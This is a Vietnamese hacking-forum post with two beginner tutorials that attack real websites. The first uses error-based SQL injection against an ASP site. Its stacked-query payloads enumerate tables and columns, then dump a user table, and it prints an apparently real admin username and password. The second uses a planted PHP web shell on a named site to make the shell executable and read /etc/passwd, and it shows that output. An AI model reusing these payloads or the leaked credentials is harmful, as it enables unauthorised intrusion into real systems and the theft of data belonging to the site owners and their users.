ặc ặc ặc ! ủa ủa ủa sao kì dậy sao nó lại ra luôn user + pass của admin trong table webuser ??? nhớ lần trước hack đâu có sãy ra chuyện này ??? Tới đây mình chưa xác định rõ table và column mà sao nó lại ra luôn user+pass luôn dậy ta Hôm nay viết tut thấy kì quặc thế nào Ko hiểu nỗi ! Đáng lẽ câu lệnh (select id from langtu) kia nó sẽ làm nhiệm vụ list tất cả các table trong data ra ! nhưng nó báo dậy thì pó chiếu hỏng biết giải thick sao Tự nhiên đang viết tut có hứng tới đây nó ra mẹ user + pass khó hiểu quá ! Quyết tìm hiểu xem vì sao lại thế chứ drop table langtu đi : Code: '; drop table langtu nó trả về trang submit tới và ko báo lỗi có nghĩa là đã OK Bây giờ thữ lại cái : Trích: '; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables select @temp as id into langtu end Rồi select ra : Trích: ' or 1=(select id from langtu) ặc ặc ! Bây giờ thì mới đúng nè híc ! Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDN T/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cdeCSTT_LS/cdeCSTT_tbao_TP CP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_dienbienTG/CdeTCCB/cdeTTKS /DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoi bat/sysconstraints/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Ty giabinhquan/Tygi /home/hethongTCTDHT.asp, line 172 Nghĩ đi nghĩ lại sao lạ quá ? Mới nãy cũng làm y hệt như trên sao nó loài ra luôn user + pass ? á á á có phải là mới nãy sau khi insert table langtu thì mình đã dùng : ' or 1=(system_user) để xem table nó đang sữ dụng là rồi rồi mới select id from langtu ra nó mới sãy ra hiện tượng loài luôn user + pass ra ko nhĩ ???? híc ! Hỏng hiểu được bỏ qua vậy Tuy đã biết user + pass nhưng mình vẫn sẽ viết tiếp cho đúng cách làm việc của nó ! Bây giờ bạn hãy thữ nhìn lên cái error list ra các table coi ??? nó hiện ra ko đầy đủ đúng ko ?? cái :" Tygiabinhquan/Tygi " có nghĩa là table nó dài quá ko list hết ra được ! hùhm, giờ sao cho nó list hết ra nhĩ ??? OK langtu dùng substring Trích: ' or 1=(select top 1 substring(id,1,100) from langtu) được : Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDN T/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cd' to a column of data type int. /home/hethongTCTDHT.asp, line 172 nó sẽ list ra 100 kí tự đầu tiên từ 1 > 100 :cool: Nhưng ta vấn chưa thấy table chứa user đâu cả tiếp tục : Microsoft OLE DB Provider for ODBC Drivers error '80040e07' Trích: [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'eCSTT_LS/cdeCSTT_tbao_TPCP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_di enbienTG/CdeTCCB/cdeTTKS/DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi /Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaob' to a column of data type int. /home/hethongTCTDHT.asp, line 172 óe ! vấn chưa thấy tiếp tục : Trích: ' or 1=(select top 1 substring(id,201,300) from langtu) Được : Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'properties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstrain ts/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Tygiabinhquan/Ty giacheo/TygiaVCB/Vanban/webgrand/webgroup/webuser/CacTCTD/cdeCNTH/cd eCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP /cdeCSTT_kqua_TTM/c' to a column of data type int. /home/hethongTCTDHT.asp, line 172 hè hè ! ta thấy table webuser rồi ! Bây giờ thì ta drop table langtu đi thôi : '; drop table langtu OK thành công ! Để lấy tất cả column trong table webuser ta lại tiếp tục insert 1 column @temp vào table webuser giống hồi nãy dậy ta ! type : Trích: '; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+column_name+'/' from information_schema.columns where table_name='webuser' select @temp as id into langtu end ko báo lỗi , tiếp tục : ' or 1=(select 1 from langtu) được : Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'uid/username/password/description/gid/grand/QL/uid/username/password/descript ion/gid/grand/QL/' to a column of data type int. /home/hethongTCTDHT.asp, line 172 drop table langtu đi và tiếp tục : Trích: '; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+username+':'+password+'/' from webuser select @temp as id into langtu end ko báo lỗi , giờ ta tiếp tục lấy user + pass : ' or 1=(select id from langtu) được : Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'levietcuong :lvc123 /' to a column of data type int. /home/hethongTCTDHT.asp, line 172 Hề hề ! Vừa viết vừa làm mất hết 4 ngàn tiền net ! híc ! Nhưng cũng học được 1 kinh nghiệm xương máu là sau khi insert table vào ta xem run query xem user db sau đó dùng query list table ra tự nhiên nó hiện user + pass luôn hê hê ! Bye bye good luck to hack ! Author : langtuhaohoa ( HCEGroup.net ) Langtuhaohoa(HCE) [tuts]- Local 4 newbie Thấy anh em trong HCE lên mem hết rồi còn mỗi mình tủi thân nên vít cái tuts local cho newbie để lên mem :D [-O< Mình sẽ check thằng thekyvn.com nhé Đầu tiên kiếm được con shell trên server noá. Ok.Kiếm được 1 con c99 roài . Safemode:Off mừng qúe :D. chơi luôn : Trích: cat /etc/passwd bùm . Ứ ra cái giè cả.Nhìn lại con shell mình chưa chmod có cái +x T_T. Tìm cái thư mục CHMOD ngu ngu roài up lên con r60 skin xanh lá của @vns3curity (ghi điểm :D ) Vấn đề là vẫn ứ có cái +x để run command. Thôi thì đành dùng đến lão Eval PHP code của con r60 . Trích: chmod ("./r60_dep_wa.php",0755); ấn nút excute Nhìn lại con r60 của mình: -rwxr-xr-x hehe có cái +x vào roài ok run command nèo : Trích: cat /etc/passwd Bùm : Trích: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash